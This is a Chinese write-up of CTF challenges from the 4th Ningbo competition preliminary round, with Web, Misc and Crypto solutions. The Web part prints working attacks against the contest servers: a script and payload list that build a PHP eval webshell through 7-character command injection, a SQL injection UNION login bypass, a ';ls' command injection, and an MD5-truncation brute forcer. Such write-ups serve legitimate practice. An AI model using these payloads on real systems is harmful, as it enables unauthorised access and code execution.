第四届宁波赛初赛赛题 wp
Web
WEB1
打开页面发现源代码
119.61.19.212:50070/exec.php
GET 1必须小于八位
a.py :
\#!/usr/bin/python\# -*- coding: UTF-8 -*-import requestsurl = "http://119.61.19.217:50070/exec.php?1={0}"print("[+]start attack!!!")with open("payload.txt","r") as f:for i in f:print("[*]" + url.format(i.strip()))requests.get(url.format(i.strip()))\#检查是否攻击成功test = requests.get("http://119.61.19.217:50070/exec.php")if test.status_code == requests.codes.ok:print("[*]Attack success!!!")
$$ Payload.txt:
>hp
>1.p\
>d>\
>\ -\
>e64\
>bas\
>7|\
>XSk\
>Fsx\
>dFV\
>kX0\
>bCg\
>XZh\
>AgZ\
>waH\
>PD9\
>o\ \
>ech\
ls -t>0
sh 0 $$
WEB2
访问:view-source:119.61.19.217:50998/index.php~
发现源码:
然后$pass这块我们要输入和加密md5一样的值, 他们的条件就成立了 就能获得flag了
通过post发送
user: 1’ and 1=2 union select
concat(‘21232f297a57a5a743894a0e4a801fc3’)#pass : admin
即可拿到flag!
WEB3
用脚本跑:
import hashlibfrom multiprocessing.dummy import Pool as ThreadPool\# MD5截断数值已知 求原始数据\# 例子 substr(md5(captcha), 0, 6)=60b7efdef md5(s): # 计算MD5字符串return hashlib.md5(str(s).encode('utf-8')).hexdigest()keymd5 = 'da29f1' #已知的md5截断值md5start = 0 # 设置题目已知的截断位置md5length = 6def findmd5(sss): # 输入范围 里面会进行md5测试key = sss.split(':')start = int(key[0]) # 开始位置end = int(key[1]) # 结束位置result = 0for i in range(start, end):\# print(md5(i)[md5start:md5length])if md5(i)[0:6] == keymd5: # 拿到加密字符串result = iprint(result) # 打印breaklist=[] # 参数列表for i in range(10): # 多线程的数字列表 开始与结尾list.append(str(10000000*i) + ':' + str(10000000*(i+1)))pool = ThreadPool() # 多线程任务pool.map(findmd5, list) # 函数 与参数列表pool.close()pool.join()
得到url:119.61.19.217:50071/4e6333ed08642de989aa4af8ec40941d.php
119.61.19.217:50071/4e6333ed08642de989aa4af8ec40941d.php?ip=127.0.0.1;ls
命令注入,但是好像环境有问题。
通过dirsearch直接扫描得到flag.php
拿到flag
WEB4
Dirsearch 扫描目录得到
view-source:119.61.19.217:51301//.index.php.swp
只要我们让file_text内容等于config.php的$test666的值就能拿到flag.
view-source:119.61.19.217:51301/index.php?file=config.php
得到config.php内容
得到flag
WEB5
扫描得到1.htaccess
得到
直接访问:119.61.19.217:50987/ctf_C1n_Fl4G
得到flag
misc
音乐和乐谱
尾部有音乐加密的密钥解密一下
彩虹
255,165,0
255,0,0
255,255,0
0,128,0
0,255,255
0,0,255
128,0,128
255165255255255128255255255128128
美丽的小姐姐
直接跑高度,修改就出flag
听雨寻知音
0010 0100 01 0100 1001 100 0001 110 10
…-. .-… .- .-… -…- -… …- --. -.
474FA66E4562828A772BC49CAE52AAD4
11011011101011011001111100010
子曰有云
佛曰解密
U2FsdGVkX19PNzVW96O4NOwIMRlbvcuHUpzSkdInC/086i4qWjwiziuu9rOnZpEFJwX9Qs4G
解 乃斐氏列与斐氏列二之解,加之。
Crypto
RSA
简单的RSA。
直接上工具解
需要注意的是e不要写成16进制的11就好了,然后到在线md5加密加密下就好了
nike
直接python2跑一下,发现sorry字样,查看代码发现有个地方改下就好了
然后得到base64字符串,解密下就得到flag,需要注意的是,有几次加密的md5几个字母会有偏差。
经过测试这个才是最终flag
简单混合密码
4 | 5 | 2 | 1 | 3 |
---|---|---|---|---|
l | h | o | e | a |
P | k | R | S | f |
{ | p | U | O | } |
g | j | l | n | a |
g | S | k | K | R |
esOnKoRulkaf}aRlP{gghkpjS
第四届宁波赛初赛赛题 wp相关推荐
- 【无标题】2020 NOC编程猫创新编程赛初赛真题
2020 NOC编程猫创新编程赛初赛真题 第1题如上图,考察坐标的知识,答案如下图. 上图是第2题,考察列表的顺序,答案如下图. 上图是第3题,考察变量和重复执行,答案如下图. 上图是第4题,考察变量 ...
- [第四届蓝桥杯省赛C++B组]省赛全题目题解
文章目录 快速分支通道 1.高斯日记 来源: 第四届蓝桥杯省赛C++A/B组 算法标签 模拟 题目描述 输出格式 思路 CPP代码 2.马虎的算式 题目描述: 算法标签: 枚举 题目答案: 题目思路: ...
- Algorithm:数学建模大赛(国赛和美赛)的简介/内容、数学建模做题流程、历年题目类型及思想、常用算法、常用工具之详细攻略
Algorithm:数学建模大赛(国赛和美赛)的简介/内容.数学建模做题流程.历年题目类型及思想.常用算法.常用工具之详细攻略 目录 国内数学建模大赛简介 1.本科生数学建模大赛 2.研究生数学建模大 ...
- 蓝桥杯单片机十一届省赛_“第十届蓝桥杯青少组C++省赛”前三题解题思路及参考答案!...
关注 及时了解信息学竞赛相关资讯 第十一届蓝桥杯青少组C++省赛即将到来,待考的各位小同学有没有刷完去年的真题呢?以下是为大家复习准备的"第十届蓝桥杯青少组C++省赛"前三题解题思 ...
- 第十届蓝桥杯大赛青少年创意编程C++组省赛 第1题 水下探测器
/* 第十届蓝桥杯大赛青少年创意编程C++组省赛 第1题 水下探测器(刘昕源)水下探测器可以潜入湖中在任意水深进行科学探索.湖水的最大深度为 h 米,即它在湖底时到水面的距离,0<=h<= ...
- 小乐乐与二段数(2019哈理工新生赛第20题)
链接:2019哈理工新生赛题解 2019哈理工新生赛第20题 T题: 链接:https://ac.nowcoder.com/acm/contest/1877/T 来源:牛客网 题目描述 小乐乐从老师口 ...
- 蓝桥杯大赛软件赛省赛,C/C++大学B组,改革后2019-2021真题知识点分类
1.蓝桥杯 比赛时长: 四个小时 比赛规则: 蓝桥杯比赛跟天梯赛.ACM还不太一样,比赛中提交的答案并没有反馈机制,也就是说你提交了答案以后,自己并不知道是对是错,就像考试一样,只有交了卷,成绩下来以 ...
- 第十三届蓝桥杯大赛软件赛省赛真题
第十三届蓝桥杯大赛软件赛省赛Java 大学 B 组 文章目录 第十三届蓝桥杯大赛软件赛省赛Java 大学 B 组 [考生须知] 试题 A: 星期计算 试题 B: 山 试题 C: 字符统计 试题 D: ...
- 2022年4月蓝桥杯软件类省赛:真题+解析
文章目录 试题 A 试题 B 试题 C 试题 D 试题 E 试题 F 试题 G 试题 H 试题 I 试题 J 相关文章: 2021年4月蓝桥杯(软件类)省赛:真题+解析 2020年10月蓝桥杯(软件类 ...
最新文章
- \\ n和\\ r之间的区别?
- 32位微处理器的虚拟技术,是“坑爹”么!
- 【POJ - 1328】Radar Installation(贪心+计算几何)安装雷达辐射岛屿
- ckeditor3 配置
- 毕业设计一周一记02
- webpack构建工具快速上手指南
- Citrix 服务器虚拟化之三十一 XenApp 6.5负载均衡
- python 回归方程及回归系数的显著性检验_回归方程及回归系数的显著性检验演示教学...
- 物联12:传输线理论
- IE离线脱机安装,解决IE11安装时需要“获取更新”
- 游戏测试流程及工作内容
- 毕业设计——基于STM32的智能家具系统(语音识别控制、步进电机、舵机)
- MYIP网站信息状态条 (MyIP Status Bar for IE)——挑战极限,一秒钟评价一个网站!
- 法制博览杂志法制博览杂志社法制博览编辑部2022年第24期目录
- VsCode+PHP开发 推荐插件
- h5难做吗_这样的h5制作难吗,通过什么平台可以做出来?
- Scala数据类型中的Symbol(符号文本)
- 读取word、pdf某些位置的值
- 教你成功在Win10系统中运行docker
- 计算机组成原理swbus,计算机组成原理实验 2.1 总线与寄存器 赖晓铮.ppt